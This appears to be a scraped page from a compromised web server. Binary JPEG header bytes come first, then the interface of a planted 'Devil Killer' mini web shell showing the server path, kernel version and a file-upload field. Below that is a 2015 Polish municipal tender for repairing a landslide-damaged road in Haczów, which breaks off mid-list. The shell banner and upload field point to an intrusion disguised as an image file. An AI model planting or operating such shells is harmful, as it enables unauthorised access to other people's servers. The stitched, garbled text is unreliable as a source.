JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150716/179378-N-2015.html

<p class="kh_header"><b>Haczów: Zabezpieczenie , remont i  rozbudowa   drogi   zlokalizowanej na  dz.   nr  ew. 2267 w  m. Haczów w  km  0+000 - 0+248 uszkodzonej   w  wyniku  odmłodzenia  się  w 2010 r.  osuwiska  - etap II.</b><br>
<b>Numer ogłoszenia: 179378 - 2015; data zamieszczenia: 16.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Haczów , Haczów 573, 36-213 Haczów, woj. podkarpackie, tel. 013 4391002, faks 013 4391696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.haczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zabezpieczenie , remont i  rozbudowa   drogi   zlokalizowanej na  dz.   nr  ew. 2267 w  m. Haczów w  km  0+000 - 0+248 uszkodzonej   w  wyniku  odmłodzenia  się  w 2010 r.  osuwiska  - etap II..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Celem przedsięwzięcia  jest  zabezpieczenie drogi  gminnej zlokalizowanej na działce 2267 oraz zabezpieczenie  odmłodzonego w 2010 roku osuwiska na działkach przyległych. Prace te pozwolą na utrzymanie ciągłości ruchu na drodze gminnej a tak że zabezpieczenie terenu przed dalszym uszkodzeniami wynikłymi z postępu zjawisk osuwiskowych. 
 Przedmiotowa inwestycja położona jest w województwie podkarpackim na terenie powiatu brzozowskiego, w obrębie gminy Haczów.  
 W stanie istniejącym na działce nr 2267 funkcjonuje nie normatywna droga gminna wewnętrzna. Ze względu na odmłodzenie si ę w 2010 r. osuwiska jej stan coraz bardziej si ę pogarsza, pozostawienie obecnego stanu rzeczy zagraża bezpiecznemu korzystających z niej uczestników ruchu. Zakres  prac przewidziany  do  realizacji: 
I CZĘŚĆ
I.WYMAGANIA OGÓLNE:
1)	Koszt dostosowania się do wymagań Warunków Kontraktu i Wymagań Ogólnych zawartych w Specyfikacji Technicznej (ryczałt)
2)	Koszty wykonania zabezpieczeń tymczasowych i docelowych lub przebudów wszystkich obiektów, urządzeń/sieci uzbrojenia terenu w rejonie objętym inwestycją (ryczałt)
3)	Wprowadzenie organizacji ruchu i utrzymywanie oznakowania w czasie trwania robót (ryczałt)
4)	Wykonanie przedłużenia kanalizacji od istniejącego wylotu u podnóża skarpy dla wykonania platformy przejazdowej (ryczałt)
5)	Geodezyjna inwentaryzacja powykonawcza (ryczałt)
ROBOTY DROGOWE
II. ROBOTY PRZYGOTOWAWCZE:
1)	Roboty pomiarowe:
- wyznaczenie trasy i punktów wysokościowych ( 2,00 km)
- odtworzenie nawierzchni drogi (1,25 km)
- wyznaczenie punktów charakterystycznych związanych z wytyczeniem pali i punktów charakterystycznych oczepów ( 0,65 km)
- wyznaczenie krawędzi spodu skarpy nasypu drogowego (0,10 km)
2)Roboty w zakresie usuwania gleby:
- zdjęcie warstwy humusu lub (i) darniny o grubości warstwy do 20cm (2765,20 m2))
- dla skarpy drogi wg tab. 2.3 (2765,20 m2))
3)Roboty rozbiórkowe, usunięcie i ochrona drzew
     4)Rozbiórka budowli inżynierskich:
- rozebranie podbudowy z kruszywa łamanego lub naturalnego grubości warstwy 15cm wraz  z odwozem gruzu na odl. do 10km ( 475,00 m2)
- rozebranie wjazdu od strony starego Kościoła: 5*35 (175,00 m2)
- rozebranie odcinka nawierzchni od końca opracowania: 3*100 (300,00 m2)
III. ROBOTY ZIEMNE
1)Wykonanie wykopów w gruntach kategorii l-V:
- roboty ziemne poprzeczne (bez transportu) wykonywane mechanicznie ( 20,00 m3)
-wykopy pod przesunięcie wylotu rowu u podnóża skarpy (20,00 m3)
- wykonanie wykopów w gruntach kategorii I-V z transportem urobku na odkład/nasyp na odl. do 6km + 2% na schodkowanie skarp (1836,31 m3)
- ilość wg tabeli 2.2 (1202,40 m3)
- ilość wg tabeli 2.3 (597,90 m3)
2)	Wykonanie nasypów:
-wykonanie nasypów mechanicznie z gruntów kategorii I-VI z uzyskanego z wykopu z transportem gruntu z odkładu (459,08 m3)
- ilość wg ilości wykopów z założeniem, że 25% gruntu z odkładu będzie nadawać się na nasyp (459,08 m3)
- wykonanie nasypów w gruntach kategorii I-III pozyskaniem i transportem gruntu z odl. ponad 15km (3772,92 m3)
- nasypy wg tabeli nr2.2, nr2.3 z odjęciem ilości gruntu z odkładu (3429,92 m3)
3)	Koryto wraz z profilowaniem i zagęszczaniem podłoża:
- koryta wykonywane mechanicznie wraz z profilowaniem i zagęszczaniem podłoża w gruntach kat.    I-VI (1272,80 m2)
- koryto pod wykonanie konstrukcji jezdni wg ilości stabilizacji (1272,80 m2)
4)	Oczyszczenie i skropienie warstw konstrukcyjnych:
- oczyszczenie warstw konstrukcyjnych ręczne (2305,20 m2 )
- ilość wg ilości podbudowy tłuczniowej i warstwy podbudowy bitumicznej (2305,20 m2 )
- skropienie warstw konstrukcyjnych emulsją asfaltową (2305,20 m2 )
- ilość wg ilości podbudowy tłuczniowej i warstwy podbudowy bitumicznej (2305,20 m2)
5)	Podbudowa z tłucznia kamiennego:
- wykonanie podbudowy z tłucznia kamiennego, gr. w-wy 20cm po zagęszczeniu ( 1223,30 m2)
- ilość wg tabeli nr 2.1 ( 1223,30 m2)
- wykonanie pod płyty drogowe platform roboczych podbudowy z tłucznia kamiennego,  gr. w-wy 50cm po zagęszczeniu (1431,10 m2)
- dla platformy dolnej wg rzutu z góry: 1301*1,1 (do wykorzystania tłuczeń z etapu nr I)   (1431,10 m2)
6)	Podbudowa i ulepszone podłoże z gruntu lub kruszywa stabilizowanego cementem:
- wykonanie podbudowy z gruntu stabilizowanego cementem (1272,80 m2)
- ilość wg tabeli nr 2.1 (1272,80 m2)
7)	Podbudowa z betonu asfaltowego:
- wykonanie podbudowy z betonu asfaltowego o uziarnieniu 0/20, gr. w-wy 7cm - analogia (1081,90 m2)
-ilość wg tabeli nr2.1 (1081,90 m2)
IV. NAWIERZCHNIE
1)	Nawierzchnie tłuczniowa - analogia:
- wykonanie nawierzchni tłucznia kamiennego, warstwa gr. w-wy 20cm (436,50 m2)
- ilość wg tabeli nr 2.1(436,50 m2)
2)	Nawierzchnia z płyt betonowych:
-wykonanie nawierzchni z płyt drogowych pełnych gr. 20cm - nawierzchnie platform roboczych  z wypełnieniem wolnych przestrzeni betonem (1301,0 m2)
-dla platformy dolnej wg rzutu z góry: (1301,0 m2)
3)Nawierzchnia z betonu asfaltowego:
- wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/16 warstwa ścieralna gr. w-wy 5cm (1092,80 m2)
- ilość wg tabeli nr2.1 (1080,50 m2)
- odbudowa nawierzchni drogi wjazdowej po frezowaniu (12,30 m2)
4)	Recykling (remixing):
- wykonanie frezowania nawierzchni asfaltowych na zimno ( 12,30 m2)
- odcinek włączenia na drodze wjazdowej od strony :starego Kościoła ( 12,30 m2)
V. ROBOTY WYKOŃCZENIOWE
1)	Umocnienie skarp, rowów i ścieków:
- ręczne plantowanie skarp i dna wykopów oraz korony nasypów w gruntach kat. I- III (2206,00 m2)
-dla korpusu drogi ilości humusowania (2206,00 m2)
- umocnienie skarp przez obsianie - wykonanie hydroobsiewu (2206,00 m2)
- wykonanie hydroobsiewu celem szybszego ukorzenienia się traw na wyhumusowanej wysokiej skarpie drogi (2206,00 m2)
- humusowanie z obsianiem skarp przy grubości humusu 5cm - humus z odkładu (2206,00 m2)
- dla umocnień skarpy wg tabeli nr2.3 (2206,00 m2)
- umocnienie dna rowów i ścieków elementami prefabrykowanymi korytkowymi - ściek drogowy (230,00 m)
-ścieki betonowe prefabrykowane korytkowe typu drogowego 60x50x15cm ułożone na podsypce cementowo-piaskowej z uszczelnieniem spoin zaprawą betonową wraz z monolitycznymi przejściami w miejscach zmiany kierunku spływu (230,00 m)
- umocnienie dna rowów i ścieków elementami prefabrykowanymi korytkowymi (28,00 m)
- ułożenie na zaprawie betonowej ścieków naskarpowych dla odprowadzenia wód z drogi   z monolitycznym włączeniem ścieku korytkowego na górze i monolitycznym betonowym fundamentem przy podnóżu (28,00 m)
VI. OZNAKOWANIE DRÓG 1 URZĄDZENIA BEZPIECZEŃSTWA RUCHU
1)Bariery ochronne stalowe:
- ustawienie barier ochronnych stalowych jednostronnych - przekładkowych; bariery SP06/2   z odblaskami oraz zakończeniami w formie łączników czołowych pojedynczych (254,00 m)
- bariery od strony rzeki Wisłok: 254 (254,00 m)
VII. ELEMENTY ULIC
1)	Krawężniki betonowe:
- ustawienie krawężników betonowych o wymiarach 15x30cm na ławie betonowej z oporem (9,40m)
-obramowanie jezdni na krawędziach wjazdowych: 2,3+3,6+3,5 (9,40m)
VIII. INNE ROBOTY
1)	Mury oporowe i inne elementy
2)	Wykonanie konstrukcji oporowej z pali CFA:
- wykonanie pali żelbetowych o śr. 800mm z betonu C20/25 (360,00 m )
- pale dolne długości 6m: 60szt (360,00 m )
- zwiększona ilość betonu w związku z wykonywaniem w gruncie pali żelbetowych (72,35 m 3)
- założono zwiększoną ilość  betonu wypełniającego wolne przestrzenie w gruncie na poziomie 40% objętości pali - w przypadku, gdy wykonawca uzna, że nadmiar jest niedostateczny powinien dodatkową ilość zawrzeć w pozycji 31 (72,35 m 3)
ROBOTY MOSTOWE
IX. FUNDAMENTY
X. WYKOPY W ŚCIANCE SZCZELNEJ Z GRODZIC STALOWYCH:
- wykonanie ścianki szczelnej z grodzic stalowych - na wodzie - ścianki G62 dla wykonania zabezpieczenia stanowisk roboczych i dróg technologicznych. Ścianki Wykonawcy robót do odzysku w całości (1130,00 m2)
- ścianka górna: demontaż wykonany w etapie II skalkulowany w etapie nr I (0,00 m2)
- ścianka dolna - odcinek nr1:55*8 (440,00 m2)
- ścianka dolna - odcinek nr2:17*5 (85,00 m2)
- ścianka dolna - odcinek nr2:121*5 (605,00 m2)
XI. KORPUSY PODPÓR
1)	Analogia - Oczep żelbetowy zwieńczający pale CFA:
- wykonanie żelbetowego oczepu na długości pali z betonu kl. C20/25 wraz z deskowaniem   i zbrojeniem stalą klasy A-IIIN oraz wykonaniem dylatacji pomiędzy segmentami oczepów (81,63 m3)
- oczep pali dolnych: 90,7*0,9 (81,63 m3)
II CZĘŚĆ
I. ROBOTY PRZYGOTOWAWCZE:
1) Tyczenie trasy robót na lewym brzegu rzeki; 0,23 km
2) Ręczne ścinanie i karczowanie rzadkich krzaków i podszycia; 0,35 ha
3) Oczyszczenie terenu z pozostałości po wykarczowaniu; 3450.00 m2
II. ROBOTY ZIEMNE:
1)Wykop z wbudowaniem w nasyp. Grunt kat. III-IV; 173.70m3
2)Mechaniczne zagęszczenie nasypów; 173.70m3
3)Wykop koparką na odkład w gr. kat. IV - Mechaniczne usunięcie namułów z korony  i skarpy odwodnej opaski brzegowej oraz ze skarpy brzegu rzeki. Wyprofilowanie skarpy brzegu w nachyleniu od 1:1,5 do 1:2; 957.70m3
4)Dokop ręczny na odkład w gr. kat. IV. - Ręczne usunięcie namułów z korony i skarpy odwodnej opaski brzegowej oraz ze skarpy brzegu rzeki. Wyprofilowanie skarpy brzegu  w nachyleniu od 1:1,5 do 1:2; 169.01m3
5)Mechaniczny wykop rowu kotwiącego (o wym. 0,8x0,8m) geosiatkę komórkową przy skarpie brzegu rzeki; 147.20m3
6)Mechaniczne zasypanie rowu kotwiącego z zagęszczeniem; 147.20m3
7)Wykop koparką na odkład w gr. kat. IV - Odtworzenie rowów nr 1 i 2 oraz wykonanie rowów na terasie zalewowej - odprowadzających wody ze ścieków naskarpowych  do rzeki Wisłok w km 165+543 i 165+598; 257.64m3
8)Wykop koparką na odkład w gr. kat. IV - Wykop liniowy wykonywany przy  stopie skarpy drogi  - pod ułożenie koszy siatkowo - kamiennych odcinkami o dł. 2m; 442.80m3
9) Rozplantowanie na koronie koszy siatkowo - kamiennych warstwy gruntu o gr. 10cm w spadku I=1% w stronę rzeki, z zagęszczeniem; 49.20m3
10) Przemieszczenie spycharkami mas ziemnych na odległość do 10 m; 711.18m3
11) Przemieszczenie spycharkami mas ziemnych na odległość do 20 m; 533.38m3
12) Przemieszczenie spycharkami mas ziemnych na odległość do 30 m; 533.38m3
13) Ręczne plantowanie skarpy brzegu rzeki - pod ułożenie geo-siatki komórkowej; 1152.00m2
14) Ręczne plantowanie skarp i dna rowów otwartych - pod ułożenie płyt ażurowych i korytek ściekowych; 501.60m2

III. BUDOWA OBIEKTÓW INŻYNIERII WODNEJ
      OPASKA BRZEGOWA
1)	Uzupełnienie narzutu kamiennego w opasce brzegowej do nachylenia 1:2 wraz z odbudową ławeczki kamiennej  szer. 0,50m na koronie opaski; 384.00m3
2)	Wykonanie podsypki z kruszywa gr. 20cm pasem szer. 1, 20m - pod ułożenie podkładów kolejowych na koronie opaski brzegowej; 270.00m2
3)	Ułożenie w koronie opaski w km 165+543, 165+598, 165+631, 165+672 - korytek ściekowych z prefabrykatów betonowych o wym. 60 x 50 x 15cm na podsypce żwirowej gr. 10cm i warstwie betonu kl. B-25 gr. 10cm; 6.80m
4)	Rozbiórka i ponowne ułożenie podkładów kolejowych betonowych na koronie opaski brzegowej; 900.00m
IV. ROWY OTWARTE
1)	Ułożenie na dnie rowów nr 1 i 2 oraz na dnie rowów odprowadzających wodę ze ścieków naskarpowych do rzeki Wisłok; 116.00m
2)	Ułożenie geowłókniny filtracyjnej na skarpach rowów otwartych pasem szer. 1.50m; 279.50m2
3)	Ułożenie płyt ażurowych o wymiarach 75x50x10cm na skarpach rowów otwartych pasem szer. 1.50m; 279.50m2
4)	Zasypanie otworów w płytach ażurowych humusem;279.50m2
5)	Ujściowy odc. rowu nr 1: Wykonanie podsypki żwirowej gr. 10cm - pod wykonanie bruku kamiennego na skarpach rowu; 9.75m2
6)	Ujściowy odc. rowu nr 1: Wykonanie podbudowy z betonu kl. B-25 o gr. 20cm - pod wykonanie bruku kamiennego na skarpach rowu; 9.75m2
7)	Ujściowy odc. rowu nr 1: Wykonanie bruku kamiennego gr. 30cm - na skarpach rowu; 9.75m2
8)	Ujściowy odc. rowu nr 1: Wykonanie spoinowania bruku kamiennego o gr. 30cm zaprawą cementową; 9.75m2
V. UBEZPIECZENIE SKARPY BRZEGU RZEKI
1)	Ułożenie na skarpie brzegu rzeki (między geosiatką) - w km 165+543, 165+598, 165+631 - korytek skarpowych trapezowych z prefabrykatów betonowych; 7.50m
2)	Ułożenie geowłókniny filtracyjnej na skarpie brzegu rzeki przygotowanie podłoża pod geosiatkę komórkową; 1382.00 m2
3)	Ułożenie na skarpie brzegu rzeki geosiatki komórkowej wys. 100mm, obustronnie teksturowanej, perforowanej, małe komórki (pole pow. jednej komórki do 265cm2); 1382.00m2
4)	Zasypanie komórek geosiatki komórkowej; 288.00m3
5)	Obsianie ubezpieczonej skarpy brzegu rzeki nasionami traw; 1152.00m2
VI. UBEZPIECZENIE SKARPY DROGI
1)	Ułożenie geowłókniny filtracyjnej na skarpie drogi - przygotowanie podłoża pod geosiatkę komórkową; 3320.50m2
2)	Ułożenie na skarpie drogi geosiatki komórkowej wys. 100mm, obustronnie teksturowanej, perforowanej; 3320.50m2
3)	Zasypanie komórek geosiatki komórkowej (wys. 10cm) i przykrycie geosynetyku warstwą (min 3-5cm) ziemi urodzajnej z zagęszczeniem; 783.53m3
4)Obsianie ubezpieczonej skarpy drogi nasionami traw w ilości 100kg/ha /za wyjątkiem górnych rzędów komórek geosiatki/; 3134.10m2
5)Wypełnienie górnych rzędów komórek geosiatki pasem szer. 0,8m żwirem fi do 31mm warstwą gr. 10cm z zagęszczeniem; 186.40m2
VII. UBEZPIECZENIE STOPY SKARPY DROGI
1.	Wykonanie podsypki z kruszywa naturalnego fi 0-32mm, gr. warstwy 20cm - pod ułożenie koszy siatkowo - kamiennych; 369.00m2
2.	Wykonanie koszy siatkowo - kamiennych o wym. 100x150x200cm przy stopie skarpy drogi; 93.00m3
3.	Rozścielenie geowłókniny filtracyjnej przeznaczonej do owinięcia koszy siatkowo - kamiennych; 1012.00m2
4.	Wykonanie koszy siatkowo - kamiennych o wym. 100x150x200cm przy stopie skarpy drogi; 173.88m3
5.	Wykonanie podsypki ze żwiru płukanego fi 8-16mm, gr. warstwy 15cm, na dnie koszy siatkowo kamiennych - przygotowanie podłoża pod ułożenie ciągu z rur drenarskich; 276.00m2
6.	Ułożenie ciągu z rur drenarskich perforowanych o średnicy 125mm w obsypce ze żwiru płukanego fi 8-16mm gr. warstwy 15cm i z tłucznia fi 31-63mm gr. warstwy 20cm; 60.72m3
7.	Ujście rurą drenarską o średnicy 125mm w obsypce piaskowej gr. 20cm - z ciągu drenarskiego do rzeki Wisłok w km 165+631; 0.55m3
VIII. ROBOTY WYKOŃCZENIOWE
1.Mechaniczne plantowanie terasy zalewowej z wyprofilowaniem spadku I=1-2% w stronę     rzeki; 2540.00m2
2.Obsianie terasy zalewowej mieszanką traw z gatunku niskopiennych; 2540.00m2
Szczegółowe dane  dotyczące obmiarów, zakresu prac  znajdują się w  przedmiarze robót , projekcie  budowlanym dołączonym  do SIWZ.
3. Do w/w prac niezależnie  od zakresu  robót objętego przedmiarem  , wynagrodzenie  ustalone będzie w formie  ryczałtowej, niezmiennie  do dnia  zakończenia realizacji  zamówienia  publicznego i  ma  zawierać ponadto wszelkie  koszty  związane z:
 - urządzeniem zaplecza budowy,
 - zabezpieczeniem robót pod względem  BHP,
-doprowadzeniem terenu po  wykonaniu  robót do  stanu  pierwotnego, 
- wyłączeniem z  ruchu ciągów  pieszych i  jezdnych,
- organizacją  placu  budowy,
- naprawą  nie zainwentaryzowanych urządzeń podziemnych
- powstałymi podczas  wykonywania robót  innymi  okolicznościami  nie  przewidzianymi  przez  Wykonawcę,
- inwentaryzacja  geodezyjna  powykonawczą

I. Wymagania  ogólne: 
1.Koszt dostosowania się do wymagań Warunków Kontraktu i Wymagań Ogólnych zawartych w Specyfikacji Technicznej DM 00.00.00
Ponadto w pozycji należy ująć koszty wykonania i rozbiórki dojazdów do miejsc wykonywania robót oraz wszelkich innych kosztów z tym związanych ( w tym transport ponadnormatywny po drogach publicznych) poza zakresem inwestycji oznaczonym na Planie Zagospodarowania.
2. Koszty wykonania zabezpieczeń tymczasowych i docelowych lub przebudów wszystkich obiektów,  urządzeń/sieci uzbrojenia terenu w rejonie objętym inwestycją i robotami związanymi transportem sprzętu zgodnie z warunkami wydanymi przez ich właścicieli lub administratorów. Koszty wykonania plomb monitorowania stanu budynków w rejonie inwestycji. Wycena obejmuje komplet robót wraz z doprowadzeniem terenu do stanu pierwotnego wraz z  kosztem nadzorów ze strony właścicieli urządzeń oraz koszt ubezpieczenia inwestycji na wypadek zniszczeń wynikłych podczas realizacji robót lub w przypadku braku należytego ubezpieczenia kosztów odszkodowań wynikających z zajęć terenu i dok. szkód w składnikach majątkowych.
3. Opracowanie projektu organizacji ruchu na czas prowadzenia robót; 1 kpl. 
4.Wprowadzenie organizacji ruchu i utrzymywanie oznakowania w czasie trwania robót :  1  kpl. 
5. Kompletna  dokumentacja  powykonawcza w  skład  której  wejdzie:
Inwentaryzacja  geodezyjna  powykonawcza, atesty, certyfikaty  , deklaracje  zgodności. : 1  kpl.

Szczegółowe dane  dotyczące obmiarów, zakresu prac  znajdują się w  przedmiarze robót , projekcie  budowlanym dołączonym  do niniejszej SIWZ.
.
3. Do w/w prac niezależnie  od zakresu  robót objętego przedmiarem  , wynagrodzenie  ustalone będzie w formie  ryczałtowej, niezmiennie  do dnia  zakończenia realizacji  zamówienia  publicznego i  ma  zawierać ponadto wszelkie  koszty  związane z:
 - urządzeniem zaplecza budowy,
 - zabezpieczeniem robót pod względem  BHP,
-doprowadzeniem terenu po  wykonaniu  robót do  stanu  pierwotnego, 
- wyłączeniem z  ruchu ciągów  pieszych i  jezdnych,
- organizacją  placu  budowy,
- naprawą  nie zainwentaryzowanych urządzeń podziemnych
- powstałymi podczas  wykonywania robót  innymi  okolicznościami  nie  przewidzianymi  przez  Wykonawcę,.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.22.00.00-5, 45.24.00.00-1, 45.24.60.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający   żąda wniesienia wadium 
 a) Wysokość wadium: Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 30.000,00 zł. ( słownie: trzydziesci  tysięcy  złotych,  zero  groszy) , 
b)Termin wniesienia wadium: Wadium wnosi się przed upływem terminu składania ofert. Wadium uznaje się za wniesione, jeżeli: 
- wnoszone w formie pieniądza znalazło się na rachunku bankowym Zamawiającego przed upływem terminu na składanie ofert. 
- wnoszone w pozostałych formach oryginały dokumentów zostały złożone w kasie Zamawiającego w budynku Urzędu Gminy w Haczowie, w pok. nr  5 przed upływem terminu składania ofert. Dokument potwierdzający wniesienie wadium należy dołączyć do oferty, przy czym:  wadium w formie pieniądza należy wnieść na rachunek bankowy Zamawiającego - Podkarpacki Bank Spółdzielczy w  Sanoku  o/Haczów nr 68864210702007700007490004 ,  w przypadku wniesienia wadium w formie innej niż pieniądz do oferty należy załączyć kserokopię dokumentu stanowiącego wadium. Oryginał tego dokumentu należy złożyć w kasie Zamawiającego w budynku Urzędu Gminy w Haczowie, w pok. Nr 5 przed upływem terminu składania ofert.
c) Wadium  może  być  wnoszone  w jednej  lub kilku następujących  formach:
- pieniądzu 
- poręczeniach  bankowych  lub poręczeniach  spółdzielczej kasy  oszczędnościowo-kredytowej, z tym ze  poręczenie kasy  jest zawsze poręczeniem pieniężnym
- gwarancjach  bankowych
- gwarancjach  ubezpieczeniowych
- poręczeniach  udzielanych  przez podmioty  o których  mowa  w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o  utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. Nr 109, poz. 1158, z póź. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
